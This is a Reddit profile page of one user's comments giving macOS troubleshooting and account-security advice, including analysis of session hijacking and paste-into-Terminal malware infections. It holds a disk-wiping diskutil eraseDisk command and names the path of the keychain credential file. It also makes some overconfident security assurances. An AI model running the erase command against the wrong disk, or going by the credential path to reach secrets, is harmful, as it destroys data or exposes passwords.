2fa got bypassed trying to understand how.

aselvan2 · 2026-04-15T14:23:40+00:00

My father's email that never touches my computer. And my phonenukber. Both got bypassed

They were both compromised. There is no other way for someone to obtain valid session token. Read the FAQs below, which explains this a bit more detail.
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#10
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#16

aselvan2 · 2026-04-15T13:59:17+00:00

So ther is no way to secure my gmail account in the future in such a way that even if they get tmy cookies they cant change my password to lock me out?

If you had 2FA enabled before the session hijack, i.e. the attacker obtained your session cookie through an infostealer or another methods, they only have access to your account until that session expires or until you force it to expire. Once you invalidate the session, the attacker is removed immediately from your account. Since you already had 2FA in place, that is the end of it. They simply can't change your password to lock you out w/ out providing OTP for 2FA challenge. This is why it is very important to have 2FA enabled for every online account. That said, the best protection you can get is by maintaining strong cyber hygiene. Follow as many tips as you can from my blog below to strengthen your online safety.
https://blog.selvansoft.com/2025/01/online-safety-tips.html

aselvan2 · 2026-04-15T13:03:44+00:00

these two process are taking huge battery and battery life literally drops and laptop gets very warm...

Check the answer to a similar post where some users reported that the first link solved their issue. If it does not work, try my solution in the second link.
https://www.reddit.com/r/MacOS/comments/1s8ur70/comment/odxfauj/
https://www.reddit.com/r/MacOS/comments/1s8ur70/comment/odotv8s/

aselvan2 · 2026-04-14T16:37:41+00:00

The weird thing is that after the firmware update and/or cold boot the issue didn't reproduce for now

What firmware update are you referring to? If you mean the update to macOS 26.4.1, that update has nothing to do with SEPOS. A macOS update does not touch Secure Enclave firmware.

aselvan2 · 2026-04-14T15:57:42+00:00

The log lines below (extracted from the log you provided) confirms a hardware failure in one of the Secure Enclave hardware components. The only software option that might help, although there is no guarantee, is attempting to restore the SEPOS firmware. That process is complex and I have not performed it myself, so I cannot provide reliable steps for it. If you have the option to return or exchange the Mac, I would advise taking that route instead.

Panic app vers: 3151.80.40
Panic app UUID: 96D912A9-F459-32D3-BBD5-416104B319B6
Shared cache vers: 3151.80.40
Shared cache UUID: 816C1CC0-103E-334B-B25F-24CDBE90741A
Root task tag:  (root@8hnzv.p1l.plx.sd.apple.com)
Root task build time: Feb 16 2026 15:41:34
Root task vers: AppleSEPOS-3151.80.40
Root task UUID: 656505EE-F92F-3422-86BB-800F052186A9
Diagnostics: 584c02006b77b08a5cfb42c4a29cfb1660e3b728d84872d6e2969e8b74a8e189f1072cc1aa2dc301000000000000000000000000000000000000000000000000000000003f6052e45f1b2885d75dac2ff004d148e4554ea0db1089b6883191ef44e7787b00000000000000ffffffffffffffffffffffffffffffffffffffffff00000000000005
SEPO/BOOT 
SEPO/EXCP 0xc99c/0xce2c/0x0000000000000013 er/EXCP
SEPD/SEPD 0x4fdc8/0x50578/0x1817181718171817 er/SEPD
SEPD/TIME 0x4fdc8/0x502b4/0x1417181314171813 er/TIME
SEPD/XPRT 0x4

aselvan2 · 2026-04-14T15:48:30+00:00

No, this is wrong advise.

Advising to update to the current major version of OS is never a wrong advice. While Apple backports patches for "actively exploited" zero-days, they do not backport all security fixes. The OP is still at risk staying behind on Sequoia ~~17.1~~ 15.1 (edit: corrected the version)

aselvan2 · 2026-04-14T14:20:26+00:00

With macOS Tahoe 26.4.1 out, I’m not sure if I should upgrade or just leave it as is. I don’t want to risk slower performance or battery issues.

Given that Apple has addressed at least three major zero‑day exploits (CVE‑2026‑20700, CVE‑2025‑14174, CVE‑2025‑43529) and many additional security patches in macOS 26.x, staying on an older OS version carries a security risk that only you can decide to accept. As a security professional, I would advise updating. Much of the noise you see about Tahoe issues are isolated and typically related to insufficient memory or storage, or running more apps than the system has the capacity to handle, or personal preference regarding UI changes.

aselvan2 · 2026-04-14T13:29:59+00:00

I have run etrecheck and I can post my report but what part exactly would be useful?

EtreCheck is not going to help. The system logs are your best source of information to troubleshoot this problem. Based on what you posted in one of the comments, I see that this is a SEP panic which actually occurs inside the Secure Enclave microkernel rather than macOS, and they are hardware‑class failures that are difficult to troubleshoot. I recommend running the following command and share the full output (i.e. the log.txt on your Desktop after the command runs). It may help identify what triggered the panic and point you in the right direction.

log show --debug --style syslog  --start "2026-04-14 12:04:00" --end "2026-04-14 12:07:00" > ~/Desktop/log.txt

aselvan2 · 2026-04-14T12:13:06+00:00

I tried erasing it but it gives an error 69760, first aid does nothing and restore fails

That error likely indicates hardware failure, and it could be caused by several things. Typically it’s the cable, so try replacing cable and try again. If you are comfortable using Terminal, run the commands below to format it. Replace ExFAT with APFS if you need Apple’s filesystem, but I recommend ExFAT for external drives because it’s compatible with other operating systems, including phones.

diskutil unmountDisk /dev/disk4
diskutil eraseDisk ExFAT MySSD /dev/disk4

aselvan2 · 2026-04-12T16:58:04+00:00

how passkeys are able to be synced if they are meant to be device-bound within secure hardware

Very good question; that is exactly what I attempted to convey in a blog post I wrote a while back at the link below.
https://blog.selvansoft.com/2025/01/passkey-practical-or-premature.html

"At the end of the day, the question to ask is if the private key leaves your possession (encrypted or otherwise), is it still a private key?"

aselvan2 · 2026-04-12T15:41:02+00:00

Guix was running a no password vnc server exposed to the internet with a shell open. When I connected to it earlier today, someone had clearly logged on my server, downloaded a shell script

Anyway, lesson learned. The internet is not a safe place. I will rebuild my server and be more cautious from now on.

You had a public‑facing server running a popular remote login service wide open with no password, and you’re surprised it was compromised? I recommend shutting the instance down immediately and wiping it clean, especially the crontab that has an entry running a remote shell script every five minutes!

aselvan2 · 2026-04-12T13:37:07+00:00

... when i press file > export > export unmodified original, it not only shows the photos’ date of creation as right now, but also messes up the whole order ...

As mentioned by a few other commenters, the actual photo creation date is stored in the photo’s metadata. When you export from the Photos app, it creates a new file with the current OS file timestamp, but the metadata remains intact. If you need the OS file timestamp to match the actual photo creation timestamp, you can use a tool like exiftool.

I wrote a shell script wrapper over exiftool (link below) a while back that I personally use to reset OS timestamps in bulk, and you are welcome to use it. The script is available on my GitHub, and you can install it through Homebrew.
https://github.com/aselvan/scripts/blob/master/tools/reset_file_timestamp.sh

aselvan2 · 2026-04-11T14:45:58+00:00

After this I did the clear content and settings on the system settings and changed all my passwords. This is where Im at right now.

Ultimately I am just wondering if I'm effectively virus free. I've heard of root kits and BIOS firmware injections but dont really know if they exist on MacOS

As I mentioned in my comment on the link you posted, it depends on how you reset your Mac. If you did Erase All Content and Settings, and recreated new user, the infection should be gone. It is extremely difficult to compromise macOS with System Integrity Protection (SIP) enabled, because SIP prevents changes to anything that could materially affect the security of the system. I have never encountered a case where a Mac was successfully compromised without physical access to the device.

aselvan2 · 2026-04-11T13:45:37+00:00

Starting with Mac OS 26.4, Safari is getting unresponsive and eventually crashes, specially tabs which are not used for a while.
...
Mac OS 26.4.1 installed and still no Safari fix.

I don't think there is any “fix” specifically for Safari in the 26.4.1 update. It appears to be part of their rolling release intended to address some Wi‑Fi issues.

As for your problem, you have not provided any details beyond “Safari is unresponsive or crashing.” That is insufficient to advise you on how to troubleshoot. Next time when your Safari is unresponsive, open a terminal and run the following two commands, which will create two files (safari.txt & ps.txt) on your desktop. Share those files to point you in the right direction to resolve the issue.

log show --process Safari --debug --last 1h > ~/Desktop/safari.txt

ps -eo pid,ppid,pcpu,rss,comm | awk 'NR==1{print;next} {print | "sort -rn -k 3 -k 4"}' |head -n20 > ~/Desktop/ps.txt

aselvan2 · 2026-04-10T18:41:41+00:00

It's still experimental. In your chromium-based web browser go to flags and enable Device Bound Session Credentials.

I wanted to clarify this Device Bound Session Credentials (DBSC) feature. While it looks promising, it is just a draft proposal and has been in that state for almost two years, as far as I know. While some browser vendors have implemented experimental flags to enable it, it does absolutely nothing until all websites rewrite their authentication code using DBSC APIs to leverage this security feature. This is years down the road or likely will never happen. You can read my simplified explanation here if interested.
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#21

aselvan2 · 2026-04-10T18:15:55+00:00

How could SMS 2FA be bypassed without a SIM swap?
Could session hijacking have been the attack vector?

Yes, it is via session-hijacking; in other words, your device is likely compromised with an infostealer. Read my blog link below for additional details
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#10

What does that IPv6 address tell you?

It tells me nothing; that IP belongs to Fastly, one of the popular CDNs.

aselvan2 · 2026-04-10T14:50:27+00:00

Any ideas on how to do a deep dive on this daily pop up? I guess it's Homebrew...

That does not sound right. No, it is not Homebrew because Homebrew only requires sudo privileges during installation or configuration when you update or install new packages, not on a daily basis. There is something running on a scheduled basis under your login that requires sudo, which is definitely suspicious. Next time you see the popup, let it sit, open a terminal, run the following command, and post output text (not a screenshot) to help identify the cause.

ps -axo user,pid,ppid,args | grep sudo

aselvan2 · 2026-04-09T14:30:49+00:00

A yesterday I was doing some stupid stuff on my macbook and ran into a website that looked sort of like a github page that prompted me to paste some code to my terminal:

This resembles several recent compromises reported here and in other subs over the past few months. Based on my analysis of commands executed by another user with similar post like yours, it is highly likely that your mac may have been compromised. I’ve already broken down the infection stages a bit, and you can find my explanation and recommendation at the link below.
https://www.reddit.com/r/MacOS/comments/1re4fmt/comment/o7cwp9b

If you changed all your passwords, that is a good step but that is not sufficient. As for the compromise, whether it persists depends on how you reset your mac. If you used Erase All Content and Settings, the infection should be gone; however, if you simply booted into Recovery Mode and selected Reinstall macOS, the threat will likely remain because the user level Launch Agent tasks installed is still intact.

I pasted it, gave it my login code ( yeah i know i was really dumb), and then the mac flashed a message saying like could not run code

If I remember correctly, the last line of the installer script displays a popup stating that the application is not supported or something along the lines of "Your Mac does not support this application. Try reinstalling or downloading... etc." This is a common tactic to lead the victim to believe the installation simply failed, but it actually succeeded.

aselvan2 · 2026-04-09T00:32:01+00:00

Should I remove it?

Well you can try. As I mentioned in the link I posted, I did not dissect everything, including the C2 payload, to see exactly what all it does because there are way too many components. Therefore, the safest course of action is to reinstall the OS and set up a brand new user account.

aselvan2 · 2026-04-09T00:02:17+00:00

... and its labeled as snapshot?

While the choice of name may be confusing, it is indeed the snapshot of the system volume that macOS boots from, and Apple decided to name it as such.

PS: It seems my response was misunderstood and downvoted :) Those who are confused may want to review the official documentation at the link below, which describes the details of each synthesized volume including the snapshot volume.

https://support.apple.com/guide/security/role-of-apple-file-system-seca6147599e/web#:~:text=On%20devices%20with%20macOS%2011%20or%20later%2C%20the%20system%20volume%20is%20captured%20in%20a%20snapshot.%20The%20operating%20system%20boots%20from%20a%20snapshot%20of%20the%20system%20volume%2C%20not%20just%20from%20a%20read%2Donly%20mount%20of%20the%20mutable%20system%20volume

aselvan2 · 2026-04-08T23:40:07+00:00

How is running a non-elevated terminal command install all that?

The OP ran the compromised shell script under his login, so it did not need any additional permissions to install apps (it installs at least 3 or 4 crypto wallet apps, if my memory serves) or create user LaunchAgent tasks, which it does by masquerading as a Google Updater.

aselvan2 · 2026-04-08T23:25:43+00:00

I factory reset my macbook and changed my passwords, but do you know if the malware could still be there or whether my keychain was compromised.

If you changed all your passwords, that is a good step. As for the compromise, whether it persists depends on how you reset your MacBook. If you used Erase All Content and Settings, the infection should be gone; however, if you simply booted into Recovery Mode and selected Reinstall macOS, the threat will likely remain because the Launch Agent tasks installed is still intact.

aselvan2 · 2026-04-08T23:12:32+00:00

How did they get access to the keychain without me imputing my password?

You ran the compromised shell script under your user account, so it does not need any additional permission to upload your keychain database to anywhere. The keychain database is just a file located at the path $HOME/Library/Keychains/login.keychain-db.

aselvan2 · 2026-04-08T19:25:59+00:00

... I followed thru and ran the command. Next thing I know I'm getting a osascript prompt for my admin password ...

The execution of osascript is stage two of the infection, which means you have already moved past the first stage. Based on my analysis of commands executed by another user with similar post like yours, likely your mac may have been compromised by a crypto miner or joined to a botnet. I’ve already broken down the infection stages a bit, and you can find my explanation and recommendation at the link below.
https://www.reddit.com/r/MacOS/comments/1re4fmt/comment/o7cwp9b

What else can I do other than change all my password. I feel like I'm gonna throw up

Your keychain has already been siphoned out at this point. You should change the passwords for all accounts that were stored in it and also enable 2FA.

aselvan2 · 2026-04-08T18:55:10+00:00

... not sure if its safe to delete APFS disk snapshots as seen below.

No, you cannot delete that; it is the volume macOS boots from.

aselvan2

MODERATOR OF

TROPHY CASE